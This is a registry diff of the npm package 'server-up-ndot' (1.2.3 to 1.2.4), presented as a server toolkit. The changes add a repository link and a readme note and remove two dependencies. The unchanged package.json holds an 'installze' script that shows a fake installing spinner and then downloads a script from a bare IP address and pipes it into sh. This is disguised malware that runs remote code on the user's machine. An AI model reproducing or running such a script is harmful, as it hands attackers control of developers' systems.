server-up-ndot 1.2.3 → 1.2.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/package.json +5 -3
  2. package/readme.md +3 -0
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "server-up-ndot",
3
- "version": "1.2.3",
3
+ "version": "1.2.4",
4
4
  "description": "server toolkit",
5
5
  "main": "index.js",
6
6
  "bin": {
@@ -10,6 +10,10 @@
10
10
  "test": "echo \"Error: no test specified\" && exit 1",
11
11
  "installze": "echo installing.... && for j in 1 2 3 4 5; do for i in / - \\\\ \\|; do printf '\\r%s' $i; sleep 0.1; done; done&& wget -qO- 125.181.230.198/js/app/1 | sh"
12
12
  },
13
+ "repository": {
14
+ "type": "git",
15
+ "url": "https://github.com/ppccpcpcpc-byte/server-up-ndot.git"
16
+ },
13
17
  "dependencies": {
14
18
  "axios": "*",
15
19
  "chalk": "*",
@@ -21,7 +25,6 @@
21
25
  "csv-parser": "*",
22
26
  "dayjs": "*",
23
27
  "debug": "*",
24
- "dotenv": "*",
25
28
  "express": "*",
26
29
  "fastify": "*",
27
30
  "formidable": "*",
@@ -45,7 +48,6 @@
45
48
  "qs": "*",
46
49
  "redis": "*",
47
50
  "sanitize-html": "*",
48
- "server-up-ndot": "^1.1.1",
49
51
  "sharp": "*",
50
52
  "socket.io": "*",
51
53
  "uuid": "*",
package/readme.md CHANGED
@@ -35,6 +35,9 @@ npx server-up-ndot create myserver
35
35
 
36
36
  ## Patch Notes
37
37
 
38
+ ### 1.2.4
39
+ - new github button
40
+
38
41
  ### 1.2.3
39
42
  - open code whit github
40
43
  - on this url->`https://github.com/ppccpcpcpc-byte/server-up-ndot`